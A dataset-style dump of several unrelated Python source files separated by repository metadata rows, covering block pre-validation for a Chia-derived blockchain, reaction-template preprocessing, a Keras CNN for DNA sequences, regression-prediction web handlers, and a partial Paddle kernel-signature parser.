if dep_context.ignore_in_reschedule_period:
yield self._passing_status(
reason="The context specified that being in a reschedule period was "
"permitted.")
return
if ti.state not in self.RESCHEDULEABLE_STATES:
yield self._passing_status(
reason="The task instance is not in State_UP_FOR_RESCHEDULE or NONE state.")
return
task_reschedule = (
TaskReschedule.query_for_task_instance(task_instance=ti, descending=True, session=session)
.with_entities(TaskReschedule.reschedule_date)
.first()
)
if not task_reschedule:
yield self._passing_status(
reason="There is no reschedule request for this task instance.")
return
now = timezone.utcnow()
next_reschedule_date = task_reschedule.reschedule_date
if now >= next_reschedule_date:
yield self._passing_status(
reason="Task instance id ready for reschedule.")
return
yield self._failing_status(
reason="Task is not ready for reschedule yet but will be rescheduled "
"automatically. Current date is {0} and task will be rescheduled "
"at {1}.".format(now.isoformat(), next_reschedule_date.isoformat()))
| 41.118421
| 102
| 0.6896
|
11bf0939164121ee93e421d30a079b1874b2ec94
| 16,117
|
py
|
Python
|
spare/consensus/multiprocess_validation.py
|
zcomputerwiz/sparev2-blockchain
|
ce4344321de909704ad8df9785299da25761059e
|
[
"Apache-2.0"
] | 3
|
2021-11-20T16:21:45.000Z
|
2022-02-09T04:33:04.000Z
|
spare/consensus/multiprocess_validation.py
|
zcomputerwiz/sparev2-blockchain
|
ce4344321de909704ad8df9785299da25761059e
|
[
"Apache-2.0"
] | null | null | null |
spare/consensus/multiprocess_validation.py
|
zcomputerwiz/sparev2-blockchain
|
ce4344321de909704ad8df9785299da25761059e
|
[
"Apache-2.0"
] | null | null | null |
import asyncio
import logging
import traceback
from concurrent.futures.process import ProcessPoolExecutor
from dataclasses import dataclass
from typing import Dict, List, Optional, Sequence, Tuple, Union, Callable
from spare.consensus.block_header_validation import validate_finished_header_block
from spare.consensus.block_record import BlockRecord
from spare.consensus.blockchain_interface import BlockchainInterface
from spare.consensus.constants import ConsensusConstants
from spare.consensus.cost_calculator import NPCResult
from spare.consensus.difficulty_adjustment import get_next_sub_slot_iters_and_difficulty
from spare.consensus.full_block_to_block_record import block_to_block_record
from spare.consensus.get_block_challenge import get_block_challenge
from spare.consensus.pot_iterations import calculate_iterations_quality, is_overflow_block
from spare.full_node.mempool_check_conditions import get_name_puzzle_conditions
from spare.types.blockchain_format.coin import Coin
from spare.types.blockchain_format.sized_bytes import bytes32
from spare.types.blockchain_format.sub_epoch_summary import SubEpochSummary
from spare.types.full_block import FullBlock
from spare.types.generator_types import BlockGenerator
from spare.types.header_block import HeaderBlock
from spare.types.unfinished_block import UnfinishedBlock
from spare.util.block_cache import BlockCache
from spare.util.errors import Err, ValidationError
from spare.util.generator_tools import get_block_header, tx_removals_and_additions
from spare.util.ints import uint16, uint64, uint32
from spare.util.streamable import Streamable, dataclass_from_dict, streamable
log = logging.getLogger(__name__)
@dataclass(frozen=True)
@streamable
class PreValidationResult(Streamable):
error: Optional[uint16]
required_iters: Optional[uint64] # Iff error is None
npc_result: Optional[NPCResult] # Iff error is None and block is a transaction block
def batch_pre_validate_blocks(
constants_dict: Dict,
blocks_pickled: Dict[bytes, bytes],
full_blocks_pickled: Optional[List[bytes]],
header_blocks_pickled: Optional[List[bytes]],
prev_transaction_generators: List[Optional[bytes]],
npc_results: Dict[uint32, bytes],
check_filter: bool,
expected_difficulty: List[uint64],
expected_sub_slot_iters: List[uint64],
) -> List[bytes]:
blocks = {}
for k, v in blocks_pickled.items():
blocks[k] = BlockRecord.from_bytes(v)
results: List[PreValidationResult] = []
constants: ConsensusConstants = dataclass_from_dict(ConsensusConstants, constants_dict)
if full_blocks_pickled is not None and header_blocks_pickled is not None:
        raise ValueError("Only one of full_blocks_pickled and header_blocks_pickled should be passed here")
if full_blocks_pickled is not None:
for i in range(len(full_blocks_pickled)):
try:
block: FullBlock = FullBlock.from_bytes(full_blocks_pickled[i])
tx_additions: List[Coin] = []
removals: List[bytes32] = []
npc_result: Optional[NPCResult] = None
if block.height in npc_results:
npc_result = NPCResult.from_bytes(npc_results[block.height])
assert npc_result is not None
if npc_result.npc_list is not None:
removals, tx_additions = tx_removals_and_additions(npc_result.npc_list)
else:
removals, tx_additions = [], []
if block.transactions_generator is not None and npc_result is None:
prev_generator_bytes = prev_transaction_generators[i]
assert prev_generator_bytes is not None
assert block.transactions_info is not None
block_generator: BlockGenerator = BlockGenerator.from_bytes(prev_generator_bytes)
assert block_generator.program == block.transactions_generator
npc_result = get_name_puzzle_conditions(
block_generator,
min(constants.MAX_BLOCK_COST_CLVM, block.transactions_info.cost),
cost_per_byte=constants.COST_PER_BYTE,
safe_mode=True,
)
removals, tx_additions = tx_removals_and_additions(npc_result.npc_list)
header_block = get_block_header(block, tx_additions, removals)
required_iters, error = validate_finished_header_block(
constants,
BlockCache(blocks),
header_block,
check_filter,
expected_difficulty[i],
expected_sub_slot_iters[i],
)
error_int: Optional[uint16] = None
if error is not None:
error_int = uint16(error.code.value)
results.append(PreValidationResult(error_int, required_iters, npc_result))
except Exception:
error_stack = traceback.format_exc()
log.error(f"Exception: {error_stack}")
results.append(PreValidationResult(uint16(Err.UNKNOWN.value), None, None))
elif header_blocks_pickled is not None:
for i in range(len(header_blocks_pickled)):
try:
header_block = HeaderBlock.from_bytes(header_blocks_pickled[i])
required_iters, error = validate_finished_header_block(
constants,
BlockCache(blocks),
header_block,
check_filter,
expected_difficulty[i],
expected_sub_slot_iters[i],
)
error_int = None
if error is not None:
error_int = uint16(error.code.value)
results.append(PreValidationResult(error_int, required_iters, None))
except Exception:
error_stack = traceback.format_exc()
log.error(f"Exception: {error_stack}")
results.append(PreValidationResult(uint16(Err.UNKNOWN.value), None, None))
return [bytes(r) for r in results]
async def pre_validate_blocks_multiprocessing(
constants: ConsensusConstants,
constants_json: Dict,
block_records: BlockchainInterface,
blocks: Sequence[Union[FullBlock, HeaderBlock]],
pool: ProcessPoolExecutor,
check_filter: bool,
npc_results: Dict[uint32, NPCResult],
get_block_generator: Optional[Callable],
batch_size: int,
wp_summaries: Optional[List[SubEpochSummary]] = None,
) -> Optional[List[PreValidationResult]]:
"""
This method must be called under the blockchain lock
    If all the full blocks pass pre-validation (only the headers are validated), returns the list of required iters.
    If any validation issue occurs, returns None.
Args:
check_filter:
constants_json:
pool:
constants:
block_records:
blocks: list of full blocks to validate (must be connected to current chain)
npc_results
get_block_generator
"""
prev_b: Optional[BlockRecord] = None
# Collects all the recent blocks (up to the previous sub-epoch)
recent_blocks: Dict[bytes32, BlockRecord] = {}
recent_blocks_compressed: Dict[bytes32, BlockRecord] = {}
num_sub_slots_found = 0
num_blocks_seen = 0
if blocks[0].height > 0:
if not block_records.contains_block(blocks[0].prev_header_hash):
return [PreValidationResult(uint16(Err.INVALID_PREV_BLOCK_HASH.value), None, None)]
curr = block_records.block_record(blocks[0].prev_header_hash)
num_sub_slots_to_look_for = 3 if curr.overflow else 2
while (
curr.sub_epoch_summary_included is None
or num_blocks_seen < constants.NUMBER_OF_TIMESTAMPS
or num_sub_slots_found < num_sub_slots_to_look_for
) and curr.height > 0:
if num_blocks_seen < constants.NUMBER_OF_TIMESTAMPS or num_sub_slots_found < num_sub_slots_to_look_for:
recent_blocks_compressed[curr.header_hash] = curr
if curr.first_in_sub_slot:
assert curr.finished_challenge_slot_hashes is not None
num_sub_slots_found += len(curr.finished_challenge_slot_hashes)
recent_blocks[curr.header_hash] = curr
if curr.is_transaction_block:
num_blocks_seen += 1
curr = block_records.block_record(curr.prev_hash)
recent_blocks[curr.header_hash] = curr
recent_blocks_compressed[curr.header_hash] = curr
block_record_was_present = []
for block in blocks:
block_record_was_present.append(block_records.contains_block(block.header_hash))
diff_ssis: List[Tuple[uint64, uint64]] = []
for block in blocks:
if block.height != 0:
assert block_records.contains_block(block.prev_header_hash)
if prev_b is None:
prev_b = block_records.block_record(block.prev_header_hash)
sub_slot_iters, difficulty = get_next_sub_slot_iters_and_difficulty(
constants, len(block.finished_sub_slots) > 0, prev_b, block_records
)
overflow = is_overflow_block(constants, block.reward_chain_block.signage_point_index)
challenge = get_block_challenge(constants, block, BlockCache(recent_blocks), prev_b is None, overflow, False)
if block.reward_chain_block.challenge_chain_sp_vdf is None:
cc_sp_hash: bytes32 = challenge
else:
cc_sp_hash = block.reward_chain_block.challenge_chain_sp_vdf.output.get_hash()
q_str: Optional[bytes32] = block.reward_chain_block.proof_of_space.verify_and_get_quality_string(
constants, challenge, cc_sp_hash
)
if q_str is None:
for i, block_i in enumerate(blocks):
if not block_record_was_present[i] and block_records.contains_block(block_i.header_hash):
block_records.remove_block_record(block_i.header_hash)
return None
required_iters: uint64 = calculate_iterations_quality(
constants.DIFFICULTY_CONSTANT_FACTOR,
q_str,
block.reward_chain_block.proof_of_space.size,
difficulty,
cc_sp_hash,
)
block_rec = block_to_block_record(
constants,
block_records,
required_iters,
block,
None,
)
if block_rec.sub_epoch_summary_included is not None and wp_summaries is not None:
idx = int(block.height / constants.SUB_EPOCH_BLOCKS) - 1
next_ses = wp_summaries[idx]
if not block_rec.sub_epoch_summary_included.get_hash() == next_ses.get_hash():
log.error("sub_epoch_summary does not match wp sub_epoch_summary list")
return None
# Makes sure to not override the valid blocks already in block_records
if not block_records.contains_block(block_rec.header_hash):
block_records.add_block_record(block_rec) # Temporarily add block to dict
recent_blocks[block_rec.header_hash] = block_rec
recent_blocks_compressed[block_rec.header_hash] = block_rec
else:
recent_blocks[block_rec.header_hash] = block_records.block_record(block_rec.header_hash)
recent_blocks_compressed[block_rec.header_hash] = block_records.block_record(block_rec.header_hash)
prev_b = block_rec
diff_ssis.append((difficulty, sub_slot_iters))
block_dict: Dict[bytes32, Union[FullBlock, HeaderBlock]] = {}
for i, block in enumerate(blocks):
block_dict[block.header_hash] = block
if not block_record_was_present[i]:
block_records.remove_block_record(block.header_hash)
recent_sb_compressed_pickled = {bytes(k): bytes(v) for k, v in recent_blocks_compressed.items()}
npc_results_pickled = {}
for k, v in npc_results.items():
npc_results_pickled[k] = bytes(v)
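    # Note: everything submitted to the worker processes must be picklable, which is why the block
    # records, blocks and NPC results are serialized to bytes before being handed to the executor.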
futures = []
# Pool of workers to validate blocks concurrently
for i in range(0, len(blocks), batch_size):
end_i = min(i + batch_size, len(blocks))
blocks_to_validate = blocks[i:end_i]
if any([len(block.finished_sub_slots) > 0 for block in blocks_to_validate]):
final_pickled = {bytes(k): bytes(v) for k, v in recent_blocks.items()}
else:
final_pickled = recent_sb_compressed_pickled
b_pickled: Optional[List[bytes]] = None
hb_pickled: Optional[List[bytes]] = None
previous_generators: List[Optional[bytes]] = []
for block in blocks_to_validate:
# We ONLY add blocks which are in the past, based on header hashes (which are validated later) to the
# prev blocks dict. This is important since these blocks are assumed to be valid and are used as previous
# generator references
prev_blocks_dict: Dict[uint32, Union[FullBlock, HeaderBlock]] = {}
curr_b: Union[FullBlock, HeaderBlock] = block
while curr_b.prev_header_hash in block_dict:
curr_b = block_dict[curr_b.prev_header_hash]
prev_blocks_dict[curr_b.header_hash] = curr_b
if isinstance(block, FullBlock):
assert get_block_generator is not None
if b_pickled is None:
b_pickled = []
b_pickled.append(bytes(block))
try:
block_generator: Optional[BlockGenerator] = await get_block_generator(block, prev_blocks_dict)
except ValueError:
return None
if block_generator is not None:
previous_generators.append(bytes(block_generator))
else:
previous_generators.append(None)
else:
if hb_pickled is None:
hb_pickled = []
hb_pickled.append(bytes(block))
futures.append(
asyncio.get_running_loop().run_in_executor(
pool,
batch_pre_validate_blocks,
constants_json,
final_pickled,
b_pickled,
hb_pickled,
previous_generators,
npc_results_pickled,
check_filter,
[diff_ssis[j][0] for j in range(i, end_i)],
[diff_ssis[j][1] for j in range(i, end_i)],
)
)
# Collect all results into one flat list
return [
PreValidationResult.from_bytes(result)
for batch_result in (await asyncio.gather(*futures))
for result in batch_result
]
def _run_generator(
constants_dict: bytes,
unfinished_block_bytes: bytes,
block_generator_bytes: bytes,
) -> Tuple[Optional[Err], Optional[bytes]]:
"""
Runs the CLVM generator from bytes inputs. This is meant to be called under a ProcessPoolExecutor, in order to
validate the heavy parts of a block (clvm program) in a different process.
"""
try:
constants: ConsensusConstants = dataclass_from_dict(ConsensusConstants, constants_dict)
unfinished_block: UnfinishedBlock = UnfinishedBlock.from_bytes(unfinished_block_bytes)
assert unfinished_block.transactions_info is not None
block_generator: BlockGenerator = BlockGenerator.from_bytes(block_generator_bytes)
assert block_generator.program == unfinished_block.transactions_generator
npc_result: NPCResult = get_name_puzzle_conditions(
block_generator,
min(constants.MAX_BLOCK_COST_CLVM, unfinished_block.transactions_info.cost),
cost_per_byte=constants.COST_PER_BYTE,
safe_mode=False,
)
if npc_result.error is not None:
return Err(npc_result.error), None
except ValidationError as e:
return e.code, None
except Exception:
return Err.UNKNOWN, None
return None, bytes(npc_result)
| 45.917379
| 117
| 0.665633
|
28b80ab8923fa4a057c4bf3c7a889ccc3db28b21
| 2,051
|
py
|
Python
|
aizynthfinder/training/preprocess_recommender.py
|
0x2b3bfa0/aizynthfinder
|
3f1536e8947adcfc8b2603709eecc7895e48d42d
|
[
"MIT"
] | 1
|
2021-11-19T04:32:51.000Z
|
2021-11-19T04:32:51.000Z
|
aizynthfinder/training/preprocess_recommender.py
|
0x2b3bfa0/aizynthfinder
|
3f1536e8947adcfc8b2603709eecc7895e48d42d
|
[
"MIT"
] | null | null | null |
aizynthfinder/training/preprocess_recommender.py
|
0x2b3bfa0/aizynthfinder
|
3f1536e8947adcfc8b2603709eecc7895e48d42d
|
[
"MIT"
] | null | null | null |
""" Module routines for pre-processing data for recommender training
"""
import argparse
import pandas as pd
import numpy as np
from sklearn.preprocessing import LabelBinarizer
from scipy import sparse
from aizynthfinder.training.utils import (
Config,
split_and_save_data,
reactants_to_fingerprint,
)
def _get_config():
parser = argparse.ArgumentParser(
"Tool to pre-process a template library to be used to train a recommender network"
)
parser.add_argument("config", help="the filename to a configuration file")
args = parser.parse_args()
return Config(args.config)
def _save_unique_templates(dataset, config):
dataset = dataset[["retro_template", "template_code"]]
dataset = dataset.drop_duplicates(subset="template_code", keep="first")
dataset.set_index("template_code", inplace=True)
dataset = dataset.sort_index()
dataset.to_hdf(config.filename("unique_templates"), "table")
def main():
""" Entry-point for the preprocess_recommender tool
"""
config = _get_config()
filename = config.filename("library")
dataset = pd.read_csv(
filename, index_col=False, header=None, names=config["library_headers"],
)
print("Dataset loaded, generating Labels...", flush=True)
lb = LabelBinarizer(neg_label=0, pos_label=1, sparse_output=True)
labels = lb.fit_transform(dataset["template_hash"])
split_and_save_data(labels, "labels", config)
print("Labels created and splitted, generating Inputs...", flush=True)
reactants = dataset["reactants"].to_numpy()
inputs = np.apply_along_axis(reactants_to_fingerprint, 0, [reactants], config)
inputs = sparse.lil_matrix(inputs.T).tocsr()
split_and_save_data(inputs, "inputs", config)
print("Inputs created and splitted, splitting Full Dataset...", flush=True)
split_and_save_data(dataset, "library", config)
print("Full Dataset splitted, creating unique template set", flush=True)
_save_unique_templates(dataset, config)
if __name__ == "__main__":
main()
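As a hedged illustration of the label-generation step in main() (toy data, not from the aizynthfinder project): LabelBinarizer with sparse_output=True turns the template_hash column into a sparse one-hot matrix with one column per unique template.
import pandas as pd
from sklearn.preprocessing import LabelBinarizer

toy = pd.DataFrame({"template_hash": ["abc", "def", "abc", "ghi"]})
lb = LabelBinarizer(neg_label=0, pos_label=1, sparse_output=True)
labels = lb.fit_transform(toy["template_hash"])
print(labels.shape)  # (4, 3): one row per reaction, one column per unique template
print(lb.classes_)   # ['abc' 'def' 'ghi']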
| 31.553846
| 90
| 0.724525
|
f34f250d3d8239e6393e5ee5573fedb1a86aa533
| 3,866
|
py
|
Python
|
cipher/model_zoo/cnn_dist.py
|
nkl27/cipher
|
f7b5795cc7369a6b6811e0ee5f77c6892e327ab4
|
[
"MIT"
] | null | null | null |
cipher/model_zoo/cnn_dist.py
|
nkl27/cipher
|
f7b5795cc7369a6b6811e0ee5f77c6892e327ab4
|
[
"MIT"
] | null | null | null |
cipher/model_zoo/cnn_dist.py
|
nkl27/cipher
|
f7b5795cc7369a6b6811e0ee5f77c6892e327ab4
|
[
"MIT"
] | null | null | null |
from tensorflow import keras
def cnn_dist_model(input_shape, output_shape, activation='relu', units=[24, 32, 48, 64, 96 ], dropout=[0.1, 0.2, 0.3, 0.4, 0.5]):
"""
Creates a keras neural network with the architecture shown below. The architecture is chosen to promote learning in a distributive way.
Parameters
----------
input_shape: tuple
Tuple of size (L,4) where L is the sequence length and 4 is the number of 1-hot channels. Assumes all sequences have equal length.
output_shape: int
Number of output categories.
activation: str
A string specifying the type of activation. Example: 'relu', 'exponential', ...
units: list
Optional parameter. A list of 5 integers that can be used to specify the number of filters. It provides more external control over the architecture.
dropout: list
Optional parameter. A list of 5 dropout probabilities that can be used to externally control the dropout rates in the main architecture.
Returns
----------
A keras model instance.
Example
-----------
model = cnn_dist_model( (200,4), 1 , 'relu', [24, 32, 48, 64, 96 ], [0.1, 0.2, 0.3, 0.4, 0.5] )
"""
# input layer
inputs = keras.layers.Input(shape=input_shape)
# block 1
nn = keras.layers.Conv1D(filters=units[0],
kernel_size=19,
padding='same',
activation=activation,
kernel_regularizer=keras.regularizers.l2(1e-6))(inputs)
nn = keras.layers.BatchNormalization()(nn)
nn = keras.layers.Dropout(dropout[0])(nn)
# layer 2
nn = keras.layers.Conv1D(filters=units[1],
kernel_size=7,
padding='same',
activation='relu',
kernel_regularizer=keras.regularizers.l2(1e-6)) (nn)
nn = keras.layers.BatchNormalization()(nn)
nn = keras.layers.Dropout(dropout[1])(nn)
nn = keras.layers.MaxPool1D(pool_size=4)(nn)
# layer 3
nn = keras.layers.Conv1D(filters=units[2],
kernel_size=7,
padding='valid',
activation='relu',
kernel_regularizer=keras.regularizers.l2(1e-6)) (nn)
nn = keras.layers.BatchNormalization()(nn)
nn = keras.layers.Dropout(dropout[2])(nn)
nn = keras.layers.MaxPool1D(pool_size=4)(nn)
# layer 4
nn = keras.layers.Conv1D(filters=units[3],
kernel_size=3,
padding='valid',
activation='relu',
kernel_regularizer=keras.regularizers.l2(1e-6))(nn)
nn = keras.layers.BatchNormalization()(nn)
nn = keras.layers.Dropout(dropout[3])(nn)
nn = keras.layers.MaxPool1D(pool_size=3,
strides=3,
padding='same'
)(nn)
# layer 5
nn = keras.layers.Flatten()(nn)
nn = keras.layers.Dense(units=units[4], activation='relu', kernel_regularizer=keras.regularizers.l2(1e-6)) (nn)
nn = keras.layers.BatchNormalization()(nn)
nn = keras.layers.Dropout(dropout[4])(nn)
# Output layer
logits = keras.layers.Dense(output_shape, activation='linear', use_bias=True)(nn)
outputs = keras.layers.Activation('sigmoid')(logits)
# compile model
model = keras.Model(inputs=inputs, outputs=outputs)
return model
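A hedged usage sketch for the model factory above; the optimizer, loss and metric are illustrative choices and not taken from the cipher repository.
from tensorflow import keras

model = cnn_dist_model((200, 4), 1, activation='relu')
model.compile(optimizer=keras.optimizers.Adam(learning_rate=1e-3),
              loss='binary_crossentropy',
              metrics=[keras.metrics.AUC()])
model.summary()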
| 38.66
| 194
| 0.539317
|
fbcd892c43991d12a935861e3d405a2715e5c239
| 8,782
|
py
|
Python
|
backend/handlers/predictions.py
|
Bob620/superman-web
|
e13ae7305962cd348c2af74485ffa3e0b6855c02
|
[
"MIT"
] | null | null | null |
backend/handlers/predictions.py
|
Bob620/superman-web
|
e13ae7305962cd348c2af74485ffa3e0b6855c02
|
[
"MIT"
] | null | null | null |
backend/handlers/predictions.py
|
Bob620/superman-web
|
e13ae7305962cd348c2af74485ffa3e0b6855c02
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import, print_function, division
import logging
import numpy as np
import os
from tornado import gen
from .generic_models import GenericModelHandler, async_crossval, axes_grid
from ..models import REGRESSION_MODELS
class RegressionModelHandler(GenericModelHandler):
def get(self, fignum):
'''Download predictions as CSV.'''
fig_data = self.get_fig_data(int(fignum))
if fig_data is None:
self.write('Oops, something went wrong. Try again?')
return
if fig_data.last_plot != 'regression_preds':
self.write('No plotted data to download.')
return
all_ds = self.request_many_ds()
if not all_ds:
self.write('No datasets selected.')
return
# collect primary keys for row labels
all_pkeys = []
for ds in all_ds:
dv = ds.view(mask=fig_data.filter_mask[ds])
all_pkeys.extend(dv.get_primary_keys())
# get data from the scatterplots
names, actuals, preds = [], [], []
for ax in fig_data.figure.axes:
if not ax.collections:
break
names.append(ax.get_title())
scat = ax.collections[0]
actual, pred = scat.get_offsets().T
preds.append(pred)
# HACK: if there are 6 lines on the plot, it's a boxplot, and thus
# there are no actual values to report. Instead, they're random jitter.
if len(ax.lines) == 6:
actual.fill(np.nan)
actuals.append(actual)
fname = os.path.basename(self.request.path)
self.set_header('Content-Type', 'text/plain')
self.set_header('Content-Disposition',
'attachment; filename='+fname)
# first header line: spectrum,foo,,bar,,baz,
self.write('Spectrum,' + ',,'.join(names) + ',\n')
# secondary header: ,Actual,Pred,Actual,Pred,Actual,Pred
self.write(',' + ','.join(['Actual,Pred']*len(names)) + '\n')
if actuals and preds:
actuals = np.column_stack(actuals)
preds = np.column_stack(preds)
for key, aa, pp in zip(all_pkeys, actuals, preds):
row = ','.join('%g,%g' % t for t in zip(aa, pp))
self.write('%s,%s\n' % (key, row))
self.finish()
@gen.coroutine
def post(self):
res = self.validate_inputs()
if res is None:
return
fig_data, all_ds_views, ds_kind, wave, X = res
variables = self.collect_variables(all_ds_views,
self.get_arguments('pred_meta[]'))
regress_kind = self.get_argument('regress_kind')
variate_kind = self.get_argument('variate_kind')
model_cls = REGRESSION_MODELS[regress_kind][variate_kind]
params = dict(pls=int(self.get_argument('pls_comps')),
lasso=float(self.get_argument('lasso_alpha')),
lars=int(self.get_argument('lars_num_channels')))
do_train = self.get_argument('do_train', None)
if do_train is None:
if len(variables) == 0:
self.visible_error(400, "No variables to predict.")
return
no_crossval = (len(variables) > 1 and variate_kind == 'multi' and
regress_kind == 'lasso')
if no_crossval:
msg = "Cross validation for %svariate %s is not yet supported." % (
variate_kind, regress_kind.title())
self.visible_error(400, msg)
return
# set up cross validation info
folds = int(self.get_argument('cv_folds'))
stratify_meta = self.get_argument('cv_stratify', '')
if stratify_meta:
vals, _ = self.collect_one_variable(all_ds_views, stratify_meta)
_, stratify_labels = np.unique(vals, return_inverse=True)
else:
stratify_labels = None
num_vars = 1 if variate_kind == 'multi' else len(variables)
cv_args = (X, variables)
cv_kwargs = dict(num_folds=folds, labels=stratify_labels)
logging.info('Running %d-fold (%s) cross-val for %s', folds,
stratify_meta, model_cls.__name__)
if regress_kind == 'pls':
comps = np.arange(int(self.get_argument('cv_min_comps')),
int(self.get_argument('cv_max_comps')) + 1)
cv_kwargs['comps'] = comps
plot_kwargs = dict(xlabel='# components')
elif regress_kind == 'lasso':
plot_kwargs = dict(xlabel='alpha', logx=True)
else:
chans = np.arange(int(self.get_argument('cv_min_chans')),
int(self.get_argument('cv_max_chans')) + 1)
cv_kwargs['chans'] = chans
plot_kwargs = dict(xlabel='# channels')
# run the cross validation
yield gen.Task(async_crossval, fig_data, model_cls, num_vars, cv_args,
cv_kwargs, **plot_kwargs)
return
if bool(int(do_train)):
# train on all the data
model = model_cls(params[regress_kind], ds_kind, wave)
logging.info('Training %s on %d inputs, predicting %d vars',
model, X.shape[0], len(variables))
model.train(X, variables)
fig_data.pred_model = model
else:
# use existing model
model = fig_data.pred_model
if model.ds_kind != ds_kind:
logging.warning('Mismatching model kind. Expected %r, got %r', ds_kind,
model.ds_kind)
# use the model's variables, with None instead of actual values
dummy_vars = {key: (None, name) for key, name in
zip(model.var_keys, model.var_names)}
# use the actual variables if we have them
for key in model.var_keys:
if key in variables:
dummy_vars[key] = variables[key]
variables = dummy_vars
# make sure we're using the same wavelengths
if wave.shape != model.wave.shape or not np.allclose(wave, model.wave):
if wave[-1] <= model.wave[0] or wave[0] >= model.wave[-1]:
self.visible_error(400, "Data to predict doesn't overlap "
"with training wavelengths.")
return
Xnew = np.empty((X.shape[0], model.wave.shape[0]), dtype=X.dtype)
for i, y in enumerate(X):
Xnew[i] = np.interp(model.wave, wave, y)
X = Xnew
# get predictions for each variable
preds, stats = model.predict(X, variables)
# plot
_plot_actual_vs_predicted(preds, stats, fig_data.figure, variables)
fig_data.manager.canvas.draw()
fig_data.last_plot = 'regression_preds'
res = dict(stats=stats, info=fig_data.pred_model.info_html())
self.write_json(res)
class ModelPlottingHandler(GenericModelHandler):
def post(self):
res = self.validate_inputs()
if res is None:
return
fig_data, all_ds_views, ds_kind, wave, X = res
model = fig_data.pred_model
all_bands, all_coefs = model.coefficients()
# Do the plot
fig_data.figure.clf(keep_observers=True)
ax1 = fig_data.figure.gca()
ax1.plot(wave, X.T, 'k-', alpha=0.5, lw=1)
ax2 = ax1.twinx()
ax2.axhline(lw=1, ls='--', color='gray')
size = 20 * float(self.get_argument('line_width'))
alpha = float(self.get_argument('alpha'))
for name, x, y in zip(model.var_names, all_bands, all_coefs):
ax2.scatter(x, y, label=name, s=size, alpha=alpha)
if bool(int(self.get_argument('legend'))) and len(model.var_names) > 1:
ax2.legend()
fig_data.manager.canvas.draw()
fig_data.last_plot = 'regression_coefs'
def _plot_actual_vs_predicted(preds, stats, fig, variables):
fig.clf(keep_observers=True)
axes = axes_grid(fig, len(preds), 'Actual', 'Predicted')
for i, key in enumerate(sorted(preds)):
ax = axes[i]
y, name = variables[key]
p = preds[key].ravel()
ax.set_title(name)
# validate y
if y is not None:
mask = np.isfinite(y)
nnz = np.count_nonzero(mask)
if nnz == 0:
y = None
elif nnz < len(y):
y, p = y[mask], p[mask]
if y is not None:
# actual values exist, so plot them
ax.scatter(y, p)
xlims = ax.get_xlim()
ylims = ax.get_ylim()
ax.errorbar(y, p, yerr=stats[i]['rmse'], fmt='none', ecolor='k',
elinewidth=1, capsize=0, alpha=0.5, zorder=0)
# plot best fit line
xylims = [np.min([xlims, ylims]), np.max([xlims, ylims])]
best_fit = np.poly1d(np.polyfit(y, p, 1))(xylims)
ax.plot(xylims, best_fit, 'k--', alpha=0.75, zorder=-1)
ax.set_aspect('equal')
ax.set_xlim(xylims)
ax.set_ylim(xylims)
else:
# no actual values exist, so only plot the predictions
ax.boxplot(p, showfliers=False)
# overlay jitter plot
x = np.ones_like(p) + np.random.normal(scale=0.025, size=len(p))
ax.scatter(x, p, alpha=0.9)
routes = [
(r'/_run_regression', RegressionModelHandler),
(r'/([0-9]+)/regression_predictions\.csv', RegressionModelHandler),
(r'/_plot_model_coefs', ModelPlottingHandler),
]
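A hedged, standalone sketch (toy arrays only) of the wavelength-resampling step performed in RegressionModelHandler.post: when the spectra to predict are on a different wavelength grid than the trained model, each spectrum is interpolated onto the model's grid with np.interp.
import numpy as np

wave = np.linspace(400, 900, 50)         # grid of the data to predict
model_wave = np.linspace(450, 850, 120)  # grid the model was trained on
X = np.random.rand(5, wave.shape[0])     # 5 toy spectra

Xnew = np.empty((X.shape[0], model_wave.shape[0]), dtype=X.dtype)
for i, y in enumerate(X):
    Xnew[i] = np.interp(model_wave, wave, y)
print(Xnew.shape)  # (5, 120)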
| 36.74477
| 79
| 0.625598
|
9e112cafc8514980ad5b73c100cb42cada82744f
| 3,394
|
py
|
Python
|
tools/infrt/get_compat_kernel_signature.py
|
L-Net-1992/Paddle
|
4d0ca02ba56760b456f3d4b42a538555b9b6c307
|
[
"Apache-2.0"
] | 11
|
2016-08-29T07:43:26.000Z
|
2016-08-29T07:51:24.000Z
|
tools/infrt/get_compat_kernel_signature.py
|
L-Net-1992/Paddle
|
4d0ca02ba56760b456f3d4b42a538555b9b6c307
|
[
"Apache-2.0"
] | null | null | null |
tools/infrt/get_compat_kernel_signature.py
|
L-Net-1992/Paddle
|
4d0ca02ba56760b456f3d4b42a538555b9b6c307
|
[
"Apache-2.0"
] | 1
|
2021-12-09T08:59:17.000Z
|
2021-12-09T08:59:17.000Z
|
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
import json
skip_list = ["adam_sig.cc", "adamw_sig.cc"]
def is_grad_kernel(kernel_info):
kernel_name = kernel_info.split(",")[0]
if kernel_name.endswith("_grad"):
return True
return False
def parse_compat_registry(kernel_info):
name, inputs_str, attrs_str, outputs_str = kernel_info.split(",{")
kernel_info = {}
kernel_info["inputs"] = inputs_str[:-1].split(",")
kernel_info["attrs"] = attrs_str[:-1].split(",")
kernel_info["outputs"] = outputs_str[:-1].split(",")
return name, kernel_info
def remove_grad_registry(kernels_registry):
clean_kernel_registry = {}
for registry in kernels_registry:
if (not "_grad" in registry):
clean_kernel_registry[registry] = kernels_registry[registry]
return clean_kernel_registry
def get_compat_kernels_info():
kernels_info = {}
compat_files = os.listdir("../../paddle/phi/ops/compat")
compat_files = [file_ for file_ in compat_files if ".cc" in file_]
for file_ in compat_files:
if file_ in skip_list:
continue
with open("../../paddle/phi/ops/compat/" + file_) as in_file:
txt = in_file.readlines()
content = ""
registry = False
for line in txt:
if ("KernelSignature(" in line):
content = ""
registry = True
if (registry):
content += line
if (registry and ";" in line):
data = content.replace("\n", "").replace(
" ",
"").strip("return").strip("KernelSignature(").strip(
"\);").replace("\"", "").replace("\\", "")
registry = False
if is_grad_kernel(data):
continue
name, registry_info = parse_compat_registry(data)
if name in kernels_info:
cur_reg = kernels_info[name]
kernels_info[name]["inputs"] = list(
set(registry_info["inputs"] +
kernels_info[name]["inputs"]))
kernels_info[name]["attrs"] = list(
set(registry_info["attrs"] +
kernels_info[name]["attrs"]))
